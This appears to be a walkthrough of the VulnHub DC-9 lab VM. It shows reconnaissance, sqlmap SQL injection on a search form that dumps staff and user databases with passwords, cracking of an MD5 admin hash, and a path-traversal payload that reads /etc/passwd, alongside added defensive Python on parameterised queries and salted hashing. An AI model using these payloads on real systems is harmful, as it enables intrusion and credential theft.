Environment:
https://download.vulnhub.com/dc/DC-9.zip
arp-scan -l  # discover all IP addresses on the current subnet
┌──(root㉿kali)-[~]
└─# arp-scan -l  # discover all IP addresses on the current subnet
Interface: eth0, type: EN10MB, MAC: 00:0c:29:42:f5:0c, IPv4: 192.168.0.4
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1 00:50:56:e1:0c:3c VMware, Inc.
192.168.0.3 00:50:56:c0:00:08 VMware, Inc.
192.168.0.114 00:0c:29:41:2f:cf VMware, Inc.
192.168.0.254 00:50:56:e9:c6:38 VMware, Inc.
7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.010 seconds (127.36 hosts/sec). 4 responded
nmap -sP 192.168.0.0/24
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.0.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-14 05:20 EST
Nmap scan report for 192.168.0.1
Host is up (0.00028s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.0.2
Host is up (0.000072s latency).
MAC Address: 00:50:56:F2:CF:16 (VMware)
Nmap scan report for 192.168.0.114
Host is up (0.000074s latency).
MAC Address: 00:0C:29:19:1A:7B (VMware)
Nmap scan report for 192.168.0.254
Host is up (0.000088s latency).
MAC Address: 00:50:56:F8:33:06 (VMware)
Nmap scan report for 192.168.0.10
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.01 seconds
Target IP: 192.168.0.114
nmap -sV -p- 192.168.0.114
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.0.114
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-14 05:21 EST
Nmap scan report for 192.168.0.114
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:19:1A:7B (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
Ports: 80 (open) and 22 (filtered)
dirsearch -u http://192.168.0.114
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.0.114
dirsearch v0.4.3
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.0.114/_25-11-14_05-21-26.txt
Target: http://192.168.0.114/
[05:21:26] Starting:
[05:21:27] 403 - 278B - /.ht_wsr.txt
[05:21:27] 403 - 278B - /.htaccess.bak1
[05:21:27] 403 - 278B - /.htaccess.orig
[05:21:27] 403 - 278B - /.htaccess.sample
[05:21:27] 403 - 278B - /.htaccess.save
[05:21:27] 403 - 278B - /.htaccess_extra
[05:21:27] 403 - 278B - /.htaccess_orig
[05:21:27] 403 - 278B - /.htaccess_sc
[05:21:27] 403 - 278B - /.htaccessBAK
[05:21:27] 403 - 278B - /.htaccessOLD
[05:21:27] 403 - 278B - /.htaccessOLD2
[05:21:27] 403 - 278B - /.htm
[05:21:27] 403 - 278B - /.html
[05:21:27] 403 - 278B - /.htpasswd_test
[05:21:27] 403 - 278B - /.htpasswds
[05:21:27] 403 - 278B - /.httr-oauth
[05:21:28] 403 - 278B - /.php
[05:21:35] 200 - 0B - /config.php
[05:21:36] 301 - 312B - /css -> http://192.168.0.114/css/
[05:21:37] 200 - 1001B - /display.php
[05:21:40] 200 - 407B - /includes/
[05:21:40] 301 - 317B - /includes -> http://192.168.0.114/includes/
[05:21:41] 302 - 0B - /logout.php -> manage.php
[05:21:42] 200 - 548B - /manage.php
[05:21:47] 200 - 485B - /search.php
[05:21:47] 403 - 278B - /server-status
[05:21:47] 403 - 278B - /server-status/
Task Completed
http://192.168.0.114:80

Request captured successfully:
POST /results.php HTTP/1.1
Host: 192.168.0.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: http://192.168.0.114/search.php
Accept-Encoding: gzip, deflate
Origin: http://192.168.0.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 13

search={{randstr(10,10,1)}}
POST /results.php HTTP/1.1
Host: 192.168.0.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: http://192.168.0.114/search.php
Accept-Encoding: gzip, deflate
Origin: http://192.168.0.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 13

search=1{{payload(mysql-payloads-fuzz)}}
POST /results.php HTTP/1.1
Host: 192.168.0.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: http://192.168.0.114/search.php
Accept-Encoding: gzip, deflate
Origin: http://192.168.0.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 13

search=11' or '1'='1
Response:
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2025 04:39:37 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 3641

<!doctype html>
<html>
<head>
<meta charset="UTF-8" />
<title>Example.com - Staff Details - Welcome</title>
<link rel="stylesheet" type="text/css" href="css/style.css" />
</head><body>
<div class="wrapper">
<header>
<div class="inner">Example.com - Staff Details</div>
</header>
<nav>
<div class="inner">
<ul>
<a href="index.php"><li>Home</li></a>
<a href="display.php"><li>Display All Records</li></a>
<a href="search.php"><li>Search</li></a>
<a href="manage.php"><li>Manage</li></a>
</ul>
</div>
</nav><div class="main">
<div class="inner">
<h3>Search results</h3>ID: 1<br />Name: Mary Moe<br />Position: CEO<br />Phone No:
46478415155456<br />Email: [email protected]<br /><br />ID: 2<br />Name:
Julie Dooley<br />Position: Human Resources<br />Phone No:
46457131654<br />Email: [email protected]<br /><br />ID: 3<br />Name:
Fred Flintstone<br />Position: Systems Administrator<br />Phone No:
46415323<br />Email: [email protected]<br /><br />ID: 4<br />Name:
Barney Rubble<br />Position: Help Desk<br />Phone No: 324643564<br />Email:
[email protected]<br /><br />ID: 5<br />Name: Tom Cat<br />Position:
Driver<br />Phone No: 802438797<br />Email: [email protected]<br /><br />ID:
6<br />Name: Jerry Mouse<br />Position: Stores<br />Phone No:
24342654756<br />Email: [email protected]<br /><br />ID: 7<br />Name:
Wilma Flintstone<br />Position: Accounts<br />Phone No: 243457487<br />Email:
[email protected]<br /><br />ID: 8<br />Name: Betty Rubble<br />Position:
Junior Accounts<br />Phone No: 90239724378<br />Email:
[email protected]<br /><br />ID: 9<br />Name: Chandler Bing<br />Position:
President - Sales<br />Phone No: 189024789<br />Email:
[email protected]<br /><br />ID: 10<br />Name: Joey Tribbiani<br />Position:
Janitor<br />Phone No: 232131654<br />Email: [email protected]<br /><br />ID:
11<br />Name: Rachel Green<br />Position: Personal Assistant<br />Phone
No: 823897243978<br />Email: [email protected]<br /><br />ID: 12<br />Name:
Ross Geller<br />Position: Instructor<br />Phone No: 6549638203<br />Email:
[email protected]<br /><br />ID: 13<br />Name: Monica Geller<br />Position:
Marketing<br />Phone No: 8092432798<br />Email: [email protected]<br /><br />ID:
14<br />Name: Phoebe Buffay<br />Position: Assistant Janitor<br />Phone
No: 43289079824<br />Email: [email protected]<br /><br />ID: 15<br />Name:
Scooter McScoots<br />Position: Resident Cat<br />Phone No:
454786464<br />Email: [email protected]<br /><br />ID: 16<br />Name:
Donald Trump<br />Position: Replacement Janitor<br />Phone No:
65464646479741<br />Email: [email protected]<br /><br />ID: 17<br />Name:
Scott Morrison<br />Position: Assistant Replacement Janitor<br />Phone
No: 47836546413<br />Email: [email protected]<br /><br />
<br /><br /><button class="btnfloat" onclick="goBack()">Go Back</button>
<script>
function goBack() {
window.history.back();
}
</script>
</div>
</div><br /><br />
<div class="clearfix"></div>
<br />
<footer>
<div class="inner"></div>
</footer>
</div>
</body>
</html>
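The tautology above returns every row because the search term is spliced straight into the SQL text. The following Python script is an added illustration, not code from DC-9 or its author: it builds an in-memory SQLite stand-in for the Staff database (the query shape `firstname = '...' OR lastname = '...'` is an assumption, since results.php's source is not shown on this page) and contrasts the string-concatenated query with a parameterised one on the same input.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample rows, a subset of the StaffDetails listing returned above.
STAFF_ROWS: List[Tuple[int, str, str, str]] = [
    (1, "Mary", "Moe", "CEO"),
    (2, "Julie", "Dooley", "Human Resources"),
    (3, "Fred", "Flintstone", "Systems Administrator"),
]

COLUMNS = "id, firstname, lastname, position"


def make_db() -> sqlite3.Connection:
    """Build an in-memory stand-in for the Staff database (SQLite, not MariaDB)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE StaffDetails (id INTEGER, firstname TEXT, lastname TEXT, position TEXT)"
    )
    conn.executemany("INSERT INTO StaffDetails VALUES (?, ?, ?, ?)", STAFF_ROWS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[Tuple]:
    """The weak pattern: the search term becomes part of the SQL statement.
    The query shape is an assumption; the page does not show results.php."""
    sql = (
        f"SELECT {COLUMNS} FROM StaffDetails "
        f"WHERE firstname = '{term}' OR lastname = '{term}'"
    )
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> List[Tuple]:
    """The fix: a parameterised query. The term is bound as data, so quotes
    and keywords inside it can never change the statement's structure."""
    sql = f"SELECT {COLUMNS} FROM StaffDetails WHERE firstname = ? OR lastname = ?"
    return conn.execute(sql, (term, term)).fetchall()


def compare(term: str) -> Tuple[int, int]:
    """Return (row count from the vulnerable query, row count from the safe query)."""
    conn = make_db()
    try:
        return len(search_vulnerable(conn, term)), len(search_safe(conn, term))
    finally:
        conn.close()


if __name__ == "__main__":
    for t in ("Mary", "11' or '1'='1"):
        vuln, safe = compare(t)
        print(f"{t!r}: vulnerable={vuln} safe={safe}")
```

With the page's input the vulnerable query returns all rows while the parameterised one returns none, because the bound value is compared literally against the name columns. The same contrast holds for the UNION and SLEEP payloads sqlmap used below: none of them can alter a bound parameter.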

POST /results.php HTTP/1.1
Host: 192.168.0.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Referer: http://192.168.0.114/search.php
Accept-Encoding: gzip, deflate
Origin: http://192.168.0.114
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Content-Length: 13

search=1
sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs
┌──(root㉿kali)-[~]
└─# sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs
sqlmap {1.9.8#stable} https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:43:02 /2025-11-21/
[23:43:02] [INFO] parsing HTTP request from '1.txt'
[23:43:02] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; fr-fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:43:02] [INFO] testing connection to the target URL
[23:43:02] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:43:02] [INFO] testing if the target URL content is stable
[23:43:03] [INFO] target URL content is stable
[23:43:03] [INFO] testing if POST parameter 'search' is dynamic
[23:43:03] [WARNING] POST parameter 'search' does not appear to be dynamic
[23:43:03] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[23:43:03] [INFO] testing for SQL injection on POST parameter 'search'
[23:43:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:43:03] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[23:43:03] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:43:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:43:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[23:43:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:43:03] [INFO] testing 'Generic inline queries'
[23:43:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[23:43:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[23:43:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[23:43:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:43:23] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[23:43:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:43:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:43:23] [INFO] target URL appears to be UNION injectable with 6 columns
[23:43:23] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3684 FROM (SELECT(SLEEP(5)))sqDb) AND 'bZhR'='bZhR

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a627a71,0x44746b55667765556861734479754c7a6851426f7a4958554f617746736b73777071434e6e554d42,0x716a6b7171),NULL-- -
---
[23:43:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:43:23] [INFO] fetching current database
current database: 'Staff'
[23:43:23] [INFO] testing if current user is DBA
[23:43:23] [INFO] fetching current user
[23:43:23] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[23:43:23] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
[23:43:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.114'
[*] ending @ 23:43:23 /2025-11-21/
Databases:
available databases [3]:
[*] information_schema
[*] Staff
[*] users
Dump the database
sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs -D Staff --dump
┌──(root㉿kali)-[~]
└─# sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs -D Staff --dump
sqlmap {1.9.8#stable} https://sqlmap.org
[*] starting @ 23:45:25 /2025-11-21/
[23:45:25] [INFO] parsing HTTP request from '1.txt'
[23:45:25] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:45:25] [INFO] resuming back-end DBMS 'mysql'
[23:45:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3684 FROM (SELECT(SLEEP(5)))sqDb) AND 'bZhR'='bZhR

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a627a71,0x44746b55667765556861734479754c7a6851426f7a4958554f617746736b73777071434e6e554d42,0x716a6b7171),NULL-- -
---
[23:45:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:45:25] [INFO] fetching current database
current database: 'Staff'
[23:45:25] [INFO] testing if current user is DBA
[23:45:25] [INFO] fetching current user
[23:45:25] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[23:45:25] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
[23:45:25] [INFO] fetching tables for database: 'Staff'
[23:45:25] [INFO] fetching columns for table 'Users' in database 'Staff'
[23:45:25] [INFO] fetching entries for table 'Users' in database 'Staff'
[23:45:25] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[23:45:25] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[23:45:25] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[23:45:25] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:45:25] [INFO] starting 4 processes
[23:45:31] [WARNING] no clear password(s) found
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+
[23:45:31] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.0.114/dump/Staff/Users.csv'
[23:45:31] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[23:45:31] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email | phone | lastname | reg_date | firstname | position |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1 | [email protected] | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO |
| 2 | [email protected] | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources |
| 3 | [email protected] | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator |
| 4 | [email protected] | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk |
| 5 | [email protected] | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver |
| 6 | [email protected] | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores |
| 7 | [email protected] | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts |
| 8 | [email protected] | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts |
| 9 | [email protected] | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales |
| 10 | [email protected] | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor |
| 11 | [email protected] | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant |
| 12 | [email protected] | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor |
| 13 | [email protected] | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing |
| 14 | [email protected] | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor |
| 15 | [email protected] | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat |
| 16 | [email protected] | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor |
| 17 | [email protected] | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
[23:45:31] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.0.114/dump/Staff/StaffDetails.csv'
[23:45:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.114'
[*] ending @ 23:45:31 /2025-11-21/
The Users table contains a username and an MD5 password hash; crack the hash to recover the password.
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+
Username: admin
Password: transorbital1
Since the application's current database is Staff, this username and password can be taken directly as the back-end administrator credentials.
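Two storage weaknesses show up in these dumps: Staff.Users keeps an unsalted MD5 hash, which is why a lookup recovers the password so quickly, and (below) users.UserDetails stores passwords in clear text. The script that follows is an added example, not the application's code, contrasting the MD5 scheme with a salted PBKDF2 verifier; the iteration count and the candidate list are constructed for the demo.

```python
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional

# Constructed work factor for the demo; production values are tuned per deployment.
PBKDF2_ITERATIONS = 200_000


def md5_hash_legacy(password: str) -> str:
    """The scheme behind Staff.Users: unsalted, fast and deterministic.
    The same password always yields the same digest, so one precomputed
    table answers every lookup, which is all an online 'MD5 decrypt' is."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def lookup_md5(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Recover an unsalted MD5 from a candidate list: no salt and no key
    stretching, so each try costs a single hash and results are reusable."""
    for pw in candidates:
        if md5_hash_legacy(pw) == digest:
            return pw
    return None


def pbkdf2_hash(password: str, salt: Optional[bytes] = None) -> Dict[str, str]:
    """Salted, slow verifier record. Store this instead of the password."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return {
        "alg": "pbkdf2-sha256",
        "iter": str(PBKDF2_ITERATIONS),
        "salt": salt.hex(),
        "hash": digest.hex(),
    }


def pbkdf2_verify(record: Dict[str, str], candidate: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode("utf-8"), bytes.fromhex(record["salt"]), int(record["iter"])
    )
    return hmac.compare_digest(digest.hex(), record["hash"])


if __name__ == "__main__":
    # Constructed candidates; a real wordlist is just a longer version of this.
    digest = md5_hash_legacy("Passw0rd")
    print("md5 lookup:", lookup_md5(digest, ["BamBam01", "Passw0rd"]))
    rec_a, rec_b = pbkdf2_hash("transorbital1"), pbkdf2_hash("transorbital1")
    print("salted records differ:", rec_a["hash"] != rec_b["hash"])
    print("verify:", pbkdf2_verify(rec_a, "transorbital1"), pbkdf2_verify(rec_a, "wrong"))
```

Because each PBKDF2 record carries its own random salt, two users with the same password get different stored hashes and a precomputed table is useless; the iteration count then makes every guess cost a configurable amount of work.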
With that established, there is still one more database, so continue dumping it.
sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs -D users --dump
┌──(root㉿kali)-[~]
└─# sqlmap -r 1.txt --random-agent --batch --current-db --is-dba --dbs -D users --dump
sqlmap {1.9.8#stable} https://sqlmap.org
[*] starting @ 23:46:57 /2025-11-21/
[23:46:57] [INFO] parsing HTTP request from '1.txt'
[23:46:57] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[23:46:57] [INFO] resuming back-end DBMS 'mysql'
[23:46:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3684 FROM (SELECT(SLEEP(5)))sqDb) AND 'bZhR'='bZhR

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a627a71,0x44746b55667765556861734479754c7a6851426f7a4958554f617746736b73777071434e6e554d42,0x716a6b7171),NULL-- -
---
[23:46:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:46:57] [INFO] fetching current database
current database: 'Staff'
[23:46:57] [INFO] testing if current user is DBA
[23:46:57] [INFO] fetching current user
[23:46:57] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[23:46:57] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
[23:46:57] [INFO] fetching tables for database: 'users'
[23:46:57] [INFO] fetching columns for table 'UserDetails' in database 'users'
[23:46:57] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
[23:46:57] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.0.114/dump/users/UserDetails.csv'
[23:46:57] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.0.114'
[*] ending @ 23:46:57 /2025-11-21/
This yields a large set of usernames and passwords; save them for later.
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
Log into the back end with the credentials obtained. After logging in, the bottom of the page shows a "file not found" message, which suggests a file inclusion; following that hint, /etc/passwd was read successfully.
用户名:admin
密码:transorbital1

Login succeeded.

A file inclusion point was found:
?file=../../../../etc/passwd

Tested and confirmed.
